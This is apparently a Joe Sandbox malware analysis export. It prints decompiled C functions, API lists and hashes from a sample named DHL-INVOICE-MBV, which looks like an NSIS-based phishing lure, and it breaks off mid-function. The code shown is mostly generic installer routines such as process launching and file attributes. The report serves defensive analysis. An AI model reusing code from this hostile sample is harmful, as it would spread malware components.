Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C41(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040288b
0x0040288b
0x00402ac8
0x00402ad4

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 587354cd6149690124072593937cdd8e7b97f99cd4d118eab288132556805b8c
Instruction ID: b9fbdb96d3617381fc4168e6aeef7157df6c2fc4641ee643fe61426fbe6ebd08
Opcode Fuzzy Hash: 587354cd6149690124072593937cdd8e7b97f99cd4d118eab288132556805b8c
Instruction Fuzzy Hash: 69D01232B04100DBDB10DBA4AF4899E73A49B44369B304677E502F11D0D6B9D9515A29

Uniqueness

Uniqueness Score: -1.00%

Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404247(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4291d8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x00404247
0x0040424e
0x00404259
0x00000000
0x00404259
0x0040425f

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C

Uniqueness

Uniqueness Score: -1.00%

Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403311(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040331f
0x00403325

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404230(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a208, 0x28, _a4, 1); // executed
				return _t2;
			}

0x0040423e
0x00404244

APIs

SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 004058B0 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058B0(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}

0x004058b0
0x004058b5
0x004058b9
0x004058bf
0x004058c5

APIs

ShellExecuteExW.SHELL32(?), ref: 004058BF

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040421D(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x4236e4, _a4); // executed
				return _t2;
			}

0x00404227
0x0040422d

APIs

KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08

Uniqueness

Uniqueness Score: -1.00%

Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F06() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C41(_t15);
				E004052EC(0xffffffeb, _t7); // executed
				_t9 = E0040586D(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E0040670F(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004061CB( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20); // executed
					CloseHandle(); // executed
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f0c
0x00401f11
0x00401f17
0x00401f1c
0x00401f20
0x0040288b
0x00401f26
0x00401f29
0x00401f2c
0x00401f34
0x00401f43
0x00401f45
0x00401f45
0x00401f36
0x00401f3a
0x00401f3a
0x00401f34
0x00401f4c
0x00401f4d
0x00401f4d
0x00402ac8
0x00402ad4

APIs

Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,0040324F), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd3A3C.tmp\System.dll), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Part of subcall function 0040586D: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
Part of subcall function 0040586D: CloseHandle.KERNEL32(?), ref: 004058A3

CloseHandle.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D

Part of subcall function 0040670F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406720
Part of subcall function 0040670F: GetExitCodeProcess.KERNEL32(?,?), ref: 00406742

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 59525b4efacae637d1a7899be62d23bd5a74c939608fde158e1f418aa1a029a2
Instruction ID: 3becab0f16e6f8309876834f620f7dc234fcc10e550b4e4e61bdbb7a81e04ee7
Opcode Fuzzy Hash: 59525b4efacae637d1a7899be62d23bd5a74c939608fde158e1f418aa1a029a2
Instruction Fuzzy Hash: 3EF09632905011DBCB20FBA1894459F76A49F00318B2445BBF902B21D1C77D0E519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C1F(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402ac8
0x00402ad4

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a534a62c68ba0751e2da4201c9068f845168481ab22296a77696cb989ecb9085
Instruction ID: ddf2f8c37bfc1fcb0df662674942ba22a859a8995a75fa35abd24466b818891c
Opcode Fuzzy Hash: a534a62c68ba0751e2da4201c9068f845168481ab22296a77696cb989ecb9085
Instruction Fuzzy Hash: BFD05E73F142008BD720DBB8BA8945E73A8E780319320883BE102F1191E97888524A2D

Uniqueness

Uniqueness Score: -1.00%

Function 7411101B Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E7411101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E74111516();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E7411153D();
			}

0x7411101b
0x74111022
0x7411102f
0x74111035
0x74111024
0x74111024
0x74111024
0x7411103c

APIs

GlobalAlloc.KERNELBASE(00000040,?,74111019,00000001), ref: 7411102F

Memory Dump Source

Source File: 00000001.00000002.18002086592.0000000074111000.00000020.00000001.01000000.00000004.sdmp, Offset: 74110000, based on PE: true

Associated: 00000001.00000002.18002024165.0000000074110000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002166253.0000000074113000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.18002259835.0000000074115000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_74110000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9a94943ce4ad5d9029d6252b67b416977dae359e814d680c35c883ab8c7ae9a0
Instruction ID: edb3c7ca0ebf5aedeb55a75a1ed73906608b2f3b78707d0e1a1a20e59b5a599b
Opcode Fuzzy Hash: 9a94943ce4ad5d9029d6252b67b416977dae359e814d680c35c883ab8c7ae9a0
Instruction Fuzzy Hash: FAC08CA2A28243BEF64173B28E85F1BE2AC8B8D251F120460F603C6084DA20C3000630

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404C68(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a248;
				_t282 = 0;
				_v24 =  *0x42a214 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a21d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404BB6(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a21c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x4236cc;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x4236e0;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x4236cc = _t282;
								 *0x4236e0 = _t282;
								 *0x42a280 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a21d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404C36();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x4236e0;
									_t195 =  *0x42a248;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a24c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t282) {
											E00404B71(0x3ff, 0xfffffffb, E00404B89(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a24c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x4236e0);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a280 = _t306;
					 *0x4236e0 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t252 = LoadBitmapW( *0x42a200, 0x6e);
					 *0x4236d4 =  *0x4236d4 | 0xffffffff;
					_t313 = _t252;
					 *0x4236dc = SetWindowLongW(_v8, 0xfffffffc, E00405260);
